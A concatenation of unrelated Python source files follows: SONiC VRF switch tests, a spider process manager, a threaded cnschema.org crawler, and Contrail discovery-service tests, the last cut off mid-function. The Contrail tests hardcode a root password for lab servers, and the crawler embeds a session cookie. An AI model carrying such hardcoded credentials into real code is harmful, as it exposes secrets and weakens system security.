# wait until background traffic finished
traffic_in_bg.join()
logger.info("Transmit done.")
passed = True
if exc_que.qsize() != 0:
passed = False
exc_type, exc_obj, exc_trace = exc_que.get()
assert passed == True, "Traffic Test Failed \n {}".format(str(exc_obj))
# wait until components finish reconcile
tbd_comp_list = finalize_warmboot(duthost)
assert len(tbd_comp_list) == 0, \
"Some components didn't finish reconcile: {} ...".format(tbd_comp_list)
# basic check after warm reboot
assert wait_until(300, 20, duthost.critical_services_fully_started), \
"All critical services should fully started!{}".format(duthost.critical_services)
up_ports = [p for p, v in cfg_facts['PORT'].items() if v.get('admin_status', None) == 'up' ]
assert wait_until(300, 20, check_interface_status, duthost, up_ports), \
"All interfaces should be up!"
def test_vrf_system_warm_reboot(self, duthosts, rand_one_dut_hostname, localhost, cfg_facts, partial_ptf_runner):
duthost = duthosts[rand_one_dut_hostname]
exc_que = Queue.Queue()
params = {
'ptf_runner': partial_ptf_runner,
'exc_queue': exc_que, # use for store exception infos
'testname': 'vrf_test.FibTest',
'fib_info_files': ["/tmp/vrf1_fib.txt"],
'src_ports': g_vars['vrf_member_port_indices']['Vrf1']
}
traffic_in_bg = threading.Thread(target=ex_ptf_runner, kwargs=params)
# send background traffic
traffic_in_bg.start()
logger.info("Start transmiting packets...")
# start system warm-reboot
logger.info("Warm reboot ...")
reboot(duthost, localhost, reboot_type="warm")
# wait until background traffic finished
traffic_in_bg.join()
logger.info("Transmit done.")
passed = True
if exc_que.qsize() != 0:
passed = False
exc_type, exc_obj, exc_trace = exc_que.get()
assert passed == True, "Test Failed: \n Exception infos => {}".format(str(exc_obj))
# wait until components finish reconcile
comp_list = ['orchagent', 'neighsyncd', 'bgp']
tbd_comp_list = finalize_warmboot(duthost, comp_list=comp_list)
assert len(tbd_comp_list) == 0, "Some components didn't finish reconcile: {} ...".format(tbd_comp_list)
# basic check after warm reboot
assert wait_until(300, 20, duthost.critical_services_fully_started), "Not all critical services are fully started"
up_ports = [p for p, v in cfg_facts['PORT'].items() if v.get('admin_status', None) == 'up' ]
assert wait_until(300, 20, check_interface_status, duthost, up_ports), "Not all interfaces are up"
class TestVrfCapacity():
VRF_CAPACITY = 1000
# limit the number of vrfs to be covered to limit script execution time
TEST_COUNT = 100
src_base_vid = 2000
dst_base_vid = 3000
ipnet1 = IPNetwork("192.1.1.0/31")
ipnet2 = IPNetwork("192.2.1.0/31")
vrf_name_tpl = "Vrf_cap_{}"
sub_if_name_tpl = "e{}.v{}" # should not include 'eth'
route_prefix = "200.200.200.0/24"
cleanup_method = 'reboot' # reboot or remove
@pytest.fixture(scope="class")
def vrf_count(self, request):
vrf_capacity = request.config.option.vrf_capacity or self.VRF_CAPACITY # get cmd line option value, use default if none
return vrf_capacity - 3 # minus global(default) VRF and Vrf1/Vrf2
@pytest.fixture(scope="class")
def random_vrf_list(self, vrf_count, request):
test_count = request.config.option.vrf_test_count or self.TEST_COUNT # get cmd line option value, use default if none
return sorted(random.sample(xrange(1, vrf_count+1), min(test_count, vrf_count)))
@pytest.fixture(scope="class", autouse=True)
def setup_vrf_capacity(self, duthosts, rand_one_dut_hostname, ptfhost, localhost, cfg_facts, vrf_count, random_vrf_list, request):
"""
Setup $VRF_CAPACITY(minus global VRF and Vrf1/Vrf2) vrfs,
2 vlan interfaces per vrf,
1 ip address per vlan interface,
1 static route per vrf, it set $route_prefix(200.200.200.0/24) next_hop point to vlan_2's neigh ip,
use the 2rd member port of Vlan1000/2000 as trunk port.
Example:
VRF RIFs Vlan_Member_Port IP Neighbor_IP(on PTF) Static_Route
Vrf_Cap_1 Vlan2001 Ethernet2 192.1.1.0/31 192.1.1.1/31 ip route 200.200.200.0/24 192.2.1.1 vrf Vrf_Cap_1
Vlan3001 Ethernet14 192.2.1.0/31 192.2.1.1/31
Vrf_Cap_2 Vlan2002 Ethernet2 192.1.1.2/31 192.1.1.3/31 ip route 200.200.200.0/24 192.2.1.3 vrf Vrf_Cap_2
Vlan3002 Ethernet14 192.2.1.2/31 192.2.1.3/31
...
"""
duthost = duthosts[rand_one_dut_hostname]
# -------- Setup ----------
duthost.shell("logger -p INFO -- '-------- {} start!!! ---------'".format(request.cls.__name__))
# increase ipv4 neigh threshold to 2k
duthost.shell("sysctl -w net.ipv4.neigh.default.gc_thresh3=2048")
# use 2rd member port of Vlan1000/Vlan2000 as trunk port
dut_port1 = get_vlan_members('Vlan1000', cfg_facts)[1]
dut_port2 = get_vlan_members('Vlan2000', cfg_facts)[1]
ptf_port1 = g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'][1]
ptf_port2 = g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000'][1]
# base ip range to be assigned to vlan rif
ip1 = self.ipnet1
ip2 = self.ipnet2
# setup $vrf_count vrfs on dut
dut_extra_vars = {
'vrf_count': vrf_count,
'src_base_vid': self.src_base_vid,
'dst_base_vid': self.dst_base_vid,
'vrf_name_tpl': self.vrf_name_tpl,
'ip1': ip1,
'ip2': ip2,
'dut_port1': dut_port1,
'dut_port2': dut_port2,
'route_prefix': self.route_prefix,
'op_code': 'add'
}
duthost.host.options['variable_manager'].extra_vars.update(dut_extra_vars)
cfg_attrs_map = OrderedDict()
# In wrost case(1k vrfs, 2k rifs), remove a vlan could take 60~80ms
# ("VlanMgr::removeHostVlan ip link del Vlan{{vlan_id}} && bridge vlan del vid {{vlan_id}} dev Bridge self" take most of the time)
# So wait up to 5(s) + 80(ms) * 2(vlans per vrf) * vrf_count when remove vlans
cfg_attrs_map['vlan'] = {'add_sleep_time': 2, 'remove_sleep_time': 5 + 0.08 * 2 * vrf_count}
# In wrost case(1k vrfs, 2k rifs), remove a vlan member from vlan could take 160~220ms
# ("vlanmgrd::removeHostVlanMember /sbin/bridge vlan show dev <devname>" take most of the time)
# So wait up to 5(s) + 220(ms) * 2(2 vlan members per vrf) * vrf_count
cfg_attrs_map['vlan_member'] = {'add_sleep_time': 2, 'remove_sleep_time': 5 + 0.2 * 2 * vrf_count}
# In wrost case(1k vrfs, 2k rifs), remove a vrf could take 6~10ms
# So wait up to 5(s) + 10(ms) * vrf_count when remove vrfs
cfg_attrs_map['vrf'] = {'add_sleep_time': 2, 'remove_sleep_time': 5 + 0.01 * vrf_count}
# In wrost case(1k vrfs, 2k rifs), remove a rif could take 30~40ms
# ("IntfMgr::getIntfIpCount ip address show <alias> master <vrfName>" take most of the time)
# So wait up to 5(s) + 40(ms) * 2(rifs per vrf) * vrf_count when remove rifs
cfg_attrs_map['vrf_intf'] = {'add_sleep_time': 2, 'remove_sleep_time': 5 + 0.04 * 2 * vrf_count}
cfg_attrs_map['vlan_intf'] = {'add_sleep_time': 2, 'remove_sleep_time': 5}
for cfg_name, attrs in cfg_attrs_map.iteritems():
src_template = 'vrf/vrf_capacity_{}_cfg.j2'.format(cfg_name)
render_file = '/tmp/vrf_capacity_{}_cfg.json'.format(cfg_name)
duthost.template(src=src_template, dest=render_file)
duthost.shell("sonic-cfggen -j {} --write-to-db".format(render_file))
time.sleep(attrs['add_sleep_time'])
# setup static routes
duthost.template(src='vrf/vrf_capacity_route_cfg.j2', dest='/tmp/vrf_capacity_route_cfg.sh', mode="0755")
duthost.shell("/tmp/vrf_capacity_route_cfg.sh")
# setup peer ip addresses on ptf
ptf_extra_vars = {
'vrf_count': vrf_count,
'src_base_vid': self.src_base_vid,
'dst_base_vid': self.dst_base_vid,
'sub_if_name_tpl': self.sub_if_name_tpl,
'ip1': ip1,
'ip2': ip2,
'ptf_port1': ptf_port1,
'ptf_port2': ptf_port2,
'random_vrf_list': random_vrf_list
}
ptfhost.host.options['variable_manager'].extra_vars.update(ptf_extra_vars)
ptfhost.template(src='vrf/vrf_capacity_ptf_cfg.j2', dest='/tmp/vrf_capacity_ptf_cfg.sh', mode="0755")
ptfhost.shell('/tmp/vrf_capacity_ptf_cfg.sh')
# ping to trigger neigh resolving, also acitvate the static routes
dut_extra_vars.update({
'random_vrf_list': random_vrf_list,
'count': 1,
'timeout': 1
})
duthost.host.options['variable_manager'].extra_vars.update(dut_extra_vars)
duthost.template(src='vrf/vrf_capacity_ping.j2', dest='/tmp/vrf_capacity_neigh_learning.sh', mode="0755")
duthost.shell('/tmp/vrf_capacity_neigh_learning.sh', module_ignore_errors=True)
# wait for route/neigh entries apply to asic
time.sleep(5)
# -------- Testing ----------
yield
# -------- Teardown ----------
# remove cfg on ptf
ptfhost.shell("ip address flush dev eth{}".format(ptf_port1))
ptfhost.shell("ip address flush dev eth{}".format(ptf_port2))
ptfhost.template(src='vrf/vrf_capacity_del_ptf_cfg.j2', dest='/tmp/vrf_capacity_del_ptf_cfg.sh', mode="0755")
ptfhost.shell('/tmp/vrf_capacity_del_ptf_cfg.sh')
duthost.shell("config interface startup {}".format(dut_port1))
duthost.shell("config interface startup {}".format(dut_port2))
# remove cfg on dut
if self.cleanup_method == 'reboot':
reboot(duthost, localhost)
else:
duthost.shell("config interface shutdown {}".format(dut_port1))
duthost.shell("config interface shutdown {}".format(dut_port2))
# flush macs, arps and neighbors
duthost.shell("sonic-clear arp")
duthost.shell("sonic-clear fdb all")
# remove static routes
dut_extra_vars['op_code'] = 'del'
duthost.host.options['variable_manager'].extra_vars.update(dut_extra_vars)
duthost.template(src='vrf/vrf_capacity_route_cfg.j2', dest='/tmp/vrf_capacity_route_cfg.sh', mode="0755")
duthost.shell('/tmp/vrf_capacity_route_cfg.sh')
# remove ip addr, intf, vrf, vlan member, vlan cfgs
for cfg_name, attrs in reversed(cfg_attrs_map.items()):
src_template = 'vrf/vrf_capacity_{}_cfg.j2'.format(cfg_name)
render_file = '/tmp/vrf_capacity_del_{}_cfg.json'.format(cfg_name)
duthost.template(src=src_template, dest=render_file)
duthost.shell("sonic-cfggen -j {} --write-to-db".format(render_file))
time.sleep(attrs['remove_sleep_time'])
duthost.shell("logger -p INFO -- '-------- {} end!!! ---------'".format(request.cls.__name__))
def test_ping(self, duthosts, rand_one_dut_hostname, random_vrf_list):
duthost = duthosts[rand_one_dut_hostname]
dut_extra_vars = {
'vrf_name_tpl': self.vrf_name_tpl,
'random_vrf_list': random_vrf_list,
'ip1': self.ipnet1,
'ip2': self.ipnet2
}
duthost.host.options['variable_manager'].extra_vars.update(dut_extra_vars)
duthost.template(src='vrf/vrf_capacity_ping.j2', dest='/tmp/vrf_capacity_ping.sh', mode="0755")
duthost.shell('/tmp/vrf_capacity_ping.sh')
def test_ip_fwd(self, partial_ptf_runner, random_vrf_list, ptfhost):
ptf_port1 = g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'][1]
ptf_port2 = g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000'][1]
dst_ips = [str(IPNetwork(self.route_prefix)[1])]
gen_specific_neigh_file(dst_ips, [[ptf_port2]], '/tmp/vrf_capability_fwd.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.CapTest",
src_ports=[ptf_port1],
fib_info_files=['/tmp/vrf_capability_fwd.txt'],
random_vrf_list=random_vrf_list,
src_base_vid=self.src_base_vid,
dst_base_vid=self.dst_base_vid
)
class TestVrfUnbindIntf():
c_vars = {
'rebind_intf': True # rebind interface during teardown stage
}
@pytest.fixture(scope="class", autouse=True)
def setup_vrf_unbindintf(self, duthosts, rand_one_dut_hostname, ptfhost, tbinfo, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
# -------- Setup ----------
duthost.shell("config interface vrf unbind PortChannel0001")
# wait for neigh/route flush
time.sleep(5)
# -------- Testing ----------
yield
# -------- Teardown ----------
if self.c_vars['rebind_intf']:
self.rebind_intf(duthost)
wait_until(120, 10, check_bgp_facts, duthost, cfg_facts)
def rebind_intf(self, duthost):
duthost.shell("config interface vrf bind PortChannel0001 Vrf1")
for ver, ips in g_vars['vrf_intfs']['Vrf1']['PortChannel0001'].iteritems():
for ip in ips:
duthost.shell("config interface ip add PortChannel0001 {}".format(ip))
@pytest.fixture(scope='class')
def setup_vrf_rebind_intf(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
self.rebind_intf(duthost)
self.c_vars['rebind_intf'] = False # Mark to skip rebind interface during teardown
# check bgp session state after rebind
assert wait_until(120, 10, check_bgp_facts, duthost, cfg_facts), \
"Bgp sessions should be re-estabalished after Portchannel0001 rebind to Vrf"
def test_pc1_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
ip_addr_show = duthost.shell("ip addr show PortChannel0001")['stdout']
for ver, ips in g_vars['vrf_intfs']['Vrf1']['PortChannel0001'].iteritems():
for ip in ips:
assert str(ip) not in ip_addr_show, "The ip addresses on PortChannel0001 should be flushed after unbind from vrf."
def test_pc1_neigh_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
# verify ipv4
show_arp = duthost.shell("show arp")['stdout']
assert 'PortChannel0001' not in show_arp, "The arps on PortChannel0001 should be flushed after unbind from vrf."
# FIXME
# ipv6 neighbors do not seem to be flushed by kernel whenever remove ipv6 addresses
# from interface. So comment out the test of ipv6 neigh flushed.
# # verify ipv6
# show_ndp = duthost.shell("show ndp")['stdout']
# assert 'PortChannel0001' not in show_ndp, "The neighbors on PortChannel0001 should be flushed after unbind from vrf."
def test_pc1_neigh_flushed_by_traffic(self, partial_ptf_runner, ptfhost):
pc1_neigh_ips = []
for ver, ips in g_vars['vrf_intfs']['Vrf1']['PortChannel0001'].iteritems():
for ip in ips:
pc1_neigh_ips.append(str(ip.ip+1))
gen_specific_neigh_file(pc1_neigh_ips, [g_vars['vrf_intf_member_port_indices']['Vrf1']['PortChannel0001']],
'/tmp/unbindvrf_neigh_1.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.FwdTest",
pkt_action='drop',
fib_info_files=['/tmp/unbindvrf_neigh_1.txt'],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'],
ipv4=True,
ipv6=False
)
def test_pc1_routes_flushed(self, ptfhost, tbinfo, partial_ptf_runner):
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
dst_intfs=['PortChannel0001'],
render_file="/tmp/unbindvrf_fib_1.txt")
# Send packet from downlink to uplink, port channel1 should no longer receive any packets
partial_ptf_runner(
testname="vrf_test.FibTest",
pkt_action='drop',
fib_info_files=["/tmp/unbindvrf_fib_1.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
def test_pc2_neigh(self, partial_ptf_runner, ptfhost):
pc2_neigh_ips = []
for ver, ips in g_vars['vrf_intfs']['Vrf1']['PortChannel0002'].iteritems():
for ip in ips:
pc2_neigh_ips.append(str(ip.ip+1))
gen_specific_neigh_file(pc2_neigh_ips, [g_vars['vrf_intf_member_port_indices']['Vrf1']['PortChannel0002']],
'/tmp/unbindvrf_neigh_2.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.FwdTest",
pkt_action='fwd',
fib_info_files=['/tmp/unbindvrf_neigh_2.txt'],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'],
)
def test_pc2_fib(self, ptfhost, tbinfo, partial_ptf_runner):
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
dst_intfs=['PortChannel0002'],
render_file="/tmp/unbindvrf_fib_2.txt")
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/unbindvrf_fib_2.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
@pytest.mark.usefixtures('setup_vrf_rebind_intf')
def test_pc1_neigh_after_rebind(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FwdTest",
pkt_action='fwd',
fib_info_files=['/tmp/unbindvrf_neigh_1.txt'],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'],
ipv4=True,
ipv6=False
)
@pytest.mark.usefixtures('setup_vrf_rebind_intf')
def test_vrf1_fib_after_rebind(self, ptfhost, tbinfo, partial_ptf_runner):
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
render_file='/tmp/rebindvrf_vrf1_fib.txt')
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/rebindvrf_vrf1_fib.txt"],
src_ports=g_vars['vrf_member_port_indices']['Vrf1']
)
class TestVrfDeletion():
c_vars = {
'restore_vrf': True
}
def restore_vrf(self, duthost):
duthost.shell("config vrf add Vrf1")
for intf, ip_facts in g_vars['vrf_intfs']['Vrf1'].iteritems():
duthost.shell("config interface vrf bind %s Vrf1" % intf)
for ver, ips in ip_facts.iteritems():
for ip in ips:
duthost.shell("config interface ip add {} {}".format(intf, ip))
@pytest.fixture(scope="class", autouse=True)
def setup_vrf_deletion(self, duthosts, rand_one_dut_hostname, ptfhost, tbinfo, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
# -------- Setup ----------
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
render_file="/tmp/vrf1_fib.txt")
gen_vrf_fib_file('Vrf2', tbinfo, ptfhost,
render_file="/tmp/vrf2_fib.txt")
gen_vrf_neigh_file('Vrf1', ptfhost, render_file="/tmp/vrf1_neigh.txt")
gen_vrf_neigh_file('Vrf2', ptfhost, render_file="/tmp/vrf2_neigh.txt")
duthost.shell("config vrf del Vrf1")
# -------- Testing ----------
yield
# -------- Teardown ----------
if self.c_vars['restore_vrf']:
self.restore_vrf(duthost)
wait_until(120, 10, check_bgp_facts, duthost, cfg_facts)
@pytest.fixture(scope='class')
def setup_vrf_restore(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
self.restore_vrf(duthost)
self.c_vars['restore_vrf'] = False # Mark to skip restore vrf during teardown
# check bgp session state after restore
assert wait_until(120, 10, check_bgp_facts, duthost, cfg_facts), \
"Bgp sessions should be re-estabalished after restore Vrf1"
def test_pc1_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
show_interfaces = duthost.shell("show ip interfaces")['stdout']
assert 'PortChannel0001' not in show_interfaces, "The ip addr of PortChannel0001 should be flushed after Vrf1 is deleted."
def test_pc2_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
show_interfaces = duthost.shell("show ip interfaces")['stdout']
assert 'PortChannel0002' not in show_interfaces, "The ip addr of PortChannel0002 should be flushed after Vrf1 is deleted."
def test_vlan1000_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
show_interfaces = duthost.shell("show ip interfaces")['stdout']
assert 'Vlan1000' not in show_interfaces, "The ip addr of Vlan1000 should be flushed after Vrf1 is deleted."
def test_loopback0_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
show_interfaces = duthost.shell("show ip interfaces")['stdout']
assert 'Loopback0' not in show_interfaces, "The ip addr of Loopback0 should be flushed after Vrf1 is deleted."
def test_vrf1_neighs_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
ip_neigh_show = duthost.shell("ip neigh show vrf Vrf1", module_ignore_errors=True)['stdout']
assert '' == ip_neigh_show, "The neighbors on Vrf1 should be flushed after Vrf1 is deleted."
def test_vrf1_neighs_flushed_by_traffic(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FwdTest",
pkt_action='drop',
fib_info_files=["/tmp/vrf1_neigh.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
def test_vrf1_routes_flushed(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FibTest",
pkt_action='drop',
fib_info_files=["/tmp/vrf1_fib.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
def test_vrf2_neigh(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FwdTest",
fib_info_files=["/tmp/vrf2_neigh.txt"],
src_ports= g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000']
)
def test_vrf2_fib(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/vrf2_fib.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000']
)
@pytest.mark.usefixtures('setup_vrf_restore')
def test_vrf1_neigh_after_restore(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FwdTest",
fib_info_files=["/tmp/vrf1_neigh.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
@pytest.mark.usefixtures('setup_vrf_restore')
def test_vrf1_fib_after_resotre(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/vrf1_fib.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
|
all.py
|
# -*- coding: utf-8 -*-
'''
@Date: 2020/1/8
@Author: fanyibin
@Description: 管理所有爬虫
'''
from config.config_parser import get_config
from os import popen
from multiprocessing import Process
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--view', help="--view all: view all spiders")
parser.add_argument('--kill', help="--kill all: kill all spiders")
parser.add_argument('--restart', help="--restart all: restart all spiders")
args = parser.parse_args()
class AllManager(object):
env = get_config('settings.ini').get('FRAME_SETTINGS', 'PYTHON_ENV')
names = get_config('spider_config.ini').options('SPIDERS')
arg_command_map = {
'view': '{} manager.py -v {}',
'kill': '{} manager.py -k {}',
'restart': '{} manager.py -rs {}',
}
def __init__(self):
self.arg_inst = self._get_arg_key()
def _get_arg_key(self):
arg_kwargs = args._get_kwargs()
for group in arg_kwargs:
if group[1] == 'all':
arg_inst = group[0]
return arg_inst
def _get_command(self, arg, name):
return self.arg_command_map[arg].format(self.env, name)
def run(self):
_task = [Process(target=self._execute_command, args=(name,)) for name in self.names]
for item_task in _task:
item_task.start()
del _task
return
def _execute_command(self, name):
popen(self._get_command(self.arg_inst, name))
if __name__ == '__main__':
man = AllManager()
man.run()
|
thread_crawler.py
|
import threading
import time
from queue import Queue
import requests
import os
from bs4 import BeautifulSoup
from PreprocessData.database_op import datasql
def run(que, json_load_path):
headers = {
'Cookie': 'OCSSID=4df0bjva6j7ejussu8al3eqo03',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
'(KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36',
}
cnt = 0
while que.empty() is not True:
try:
url = que.get()
filename = url[url.rfind('/') + 1:-5]
path = '{}/{}.json'.format(json_load_path, filename)
if os.path.exists(path) is True:
print("%s 已经存在。" % (filename))
continue
res = requests.get(url, headers=headers)
soup = BeautifulSoup(res.content, "html.parser", from_encoding='gb18030')
with open(path, 'w', encoding='utf-8') as f:
f.write(soup.text)
f.close()
time.sleep(1)
cnt = cnt + 1
print("完成第 %s 个" % (cnt))
except Exception as e:
print(e)
def prepare(dest, result):
queue = Queue()
json_load_path = r'../all_{}_json'.format(dest)
for obj in result:
# print('http://cnschema.org/data/' + obj[0] + '.json')
queue.put('http://cnschema.org/data/' + obj[0] + '.json')
for i in range(1, 6):
t = threading.Thread(target=run, args=(queue, json_load_path))
t.start()
t.join()
if __name__ == '__main__':
dest = 'property' # 爬取实体还是属性
msql = datasql()
result = msql.query('{}_tab'.format(dest))
prepare(dest, result)
# filter_pro(json_load_path) ##爬取的某些json中格式有错误,需要纠正
|
test_discovery_serial.py
|
import unittest
import fixtures
import testtools
import traceback
from tcutils.wrappers import preposttest_wrapper
import uuid
import base
import test
import time
from time import sleep
import threading
from tcutils.config.discovery_util import DiscoveryServerUtils
from tcutils.contrail_status_check import ContrailStatusChecker
from multiprocessing import Process
class TestDiscoverySerial(base.BaseDiscoveryTest):
@classmethod
def setUpClass(cls):
super(TestDiscoverySerial, cls).setUpClass()
def runTest(self):
pass
# end runTest
@test.attr(type=['sanity', 'vcenter'])
@preposttest_wrapper
def test_control_node_restart_and_validate_status_of_the_service(self):
''' Validate restart of control node services
'''
result = True
svc_lst = []
svc_lst = self.ds_obj.get_all_control_services(self.inputs.cfgm_ip)
for elem in svc_lst:
if (self.ds_obj.get_service_status(self.inputs.cfgm_ip, service_tuple=elem) == 'up'):
self.logger.info("Service %s is up" % (elem,))
result = result and True
else:
self.logger.warn("Service %s is down" % (elem,))
result = result and False
svc_lst.remove(elem)
# Stopping the control node service
for elem in svc_lst:
ip = elem[0]
self.logger.info("Stopping service %s.." % (elem,))
self.inputs.stop_service('contrail-control', [ip])
time.sleep(20)
for elem in svc_lst:
ip = elem[0]
if (self.ds_obj.get_service_status(self.inputs.cfgm_ip, service_tuple=elem) == 'up'):
self.logger.warn("Service %s is still up" % (elem,))
result = result and False
else:
self.logger.info("Service %s is down" % (elem,))
result = result and True
# Starting the control node service
for elem in svc_lst:
ip = elem[0]
self.logger.info("Starting service %s.." % (elem,))
self.inputs.start_service('contrail-control', [ip])
retry = 0
for elem in svc_lst:
ip = elem[0]
while True:
svc_status = self.ds_obj.get_service_status(self.inputs.cfgm_ip, service_tuple=elem)
if svc_status == 'up':
self.logger.info(
"Service %s came up after service was started" % (elem,))
result = result and True
break
else:
retry = retry + 1
time.sleep(1)
self.logger.warn("Service %s isn't up yet " % (elem,))
if retry > 30:
self.logger.info(
"Service %s is down even after service was started" % (elem,))
result = result and False
break
assert result
return True
@preposttest_wrapper
def test_scale_test(self):
''' Publish 100 sevices, subscribe to them and then delete them
'''
try:
service = 'dummy_service'
port = 658093
base_ip = '192.168.1.'
result = True
# Changing the hc_max_miss=3000 and verifying that the services are
# down after 25 mins
cmd = 'cd /etc/contrail;sed -i \'/hc_max_miss/c\hc_max_miss = 3000\' contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
cmd = 'cd /etc/contrail;sed -i \'/ttl_short/c\\ttl_short = 2\' contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
cmd = 'cd /etc/contrail;cat contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
out_put = self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
self.logger.info("%s" % (out_put))
self.inputs.restart_service('contrail-discovery', [ip])
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
time.sleep(10)
# Bringing up services
self.logger.info("Bringing up services...")
threads = []
published_service_lst = []
for x in range(1, 101):
svc_ip = base_ip + str(x)
svc = 'svc' + str(x)
# self.logger.info("Publishing service with ip %s and port %s"%(svc_ip,port))
t = threading.Thread(target=self.ds_obj.publish_service_to_discovery, args=(
self.inputs.cfgm_ip, service, svc_ip, port))
threads.append(t)
for th in threads:
self.logger.info("Publishing service with ip %s and port %s" %
(svc_ip, port))
th.start()
for th in threads:
th.join()
# svc = self.ds_obj.publish_service_to_discovery(service=service,ip=svc_ip,port=port)
time.sleep(5)
self.logger.info("Verifying all services are up...")
svc = self.ds_obj.get_all_services_by_service_name(
self.inputs.cfgm_ip, service=service)
for elem in svc:
ip = elem['info']['ip-address']
elem = (ip, elem['service_type'])
self.logger.info("ip: %s" % (ip))
if (ip in (base_ip + str(x) for x in range(1, 101))):
self.logger.info("%s is added to discovery service" %
(elem,))
result = result and True
self.logger.info("Verifying if the service is up")
svc_status = self.ds_obj.get_service_status(
self.inputs.cfgm_ip, service_tuple=elem)
if (svc_status == 'up'):
self.logger.info("svc is up")
result = result and True
else:
result = result and False
self.logger.warn("svc not up")
else:
self.logger.warn("%s is NOT added to discovery service" %
(elem,))
result = result and False
# Verify instnaces == 0 will send all services
cuuid = uuid.uuid4()
resp = self.ds_obj.subscribe_service_from_discovery(
self.inputs.cfgm_ip, service=service, instances=0, client_id=str(cuuid))
resp = resp[service]
if len(resp) < 100:
result = result and False
self.logger.warn("Not all services returned")
self.logger.info(
"Sending 100 subscription message to discovery..")
subs_threads = []
for i in range(100):
cuuid = uuid.uuid4()
t = threading.Thread(target=self.ds_obj.subscribe_service_from_discovery, args=(
self.inputs.cfgm_ip, service, 2, str(cuuid)))
subs_threads.append(t)
for th in subs_threads:
th.start()
time.sleep(3)
for th in subs_threads:
th.join()
# assert result
except Exception as e:
print e
finally:
# Chaging the contrail-discovery.conf to default
cmd = 'cd /etc/contrail;sed -i \'/hc_max_miss/c\hc_max_miss = 3\' contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
cmd = 'cd /etc/contrail;sed -i \'/ttl_short/c\\ttl_short = 1\' contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
cmd = 'cd /etc/contrail;cat contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
out_put = self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
self.logger.info("%s" % (out_put))
self.inputs.restart_service('contrail-discovery', [ip])
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
time.sleep(10)
resp = None
resp = self.ds_obj.cleanup_service_from_discovery(
self.inputs.cfgm_ip)
assert result
return True
# End test test_scale_test
@preposttest_wrapper
def test_send_admin_state_in_publish(self):
''' 1) Publish services with admin state down
2) Subscribe clients, and verify that discovery server should not allocate down services
3) Update admin state of published services from down to up
4) Subscribe clients, and verify that discovery server should allocate the services
5) Cleanup
'''
try:
service = 'my_svc_admin_state'
port = 65093
base_ip = '192.168.10.'
no_of_services = 25
result = True
msg = ''
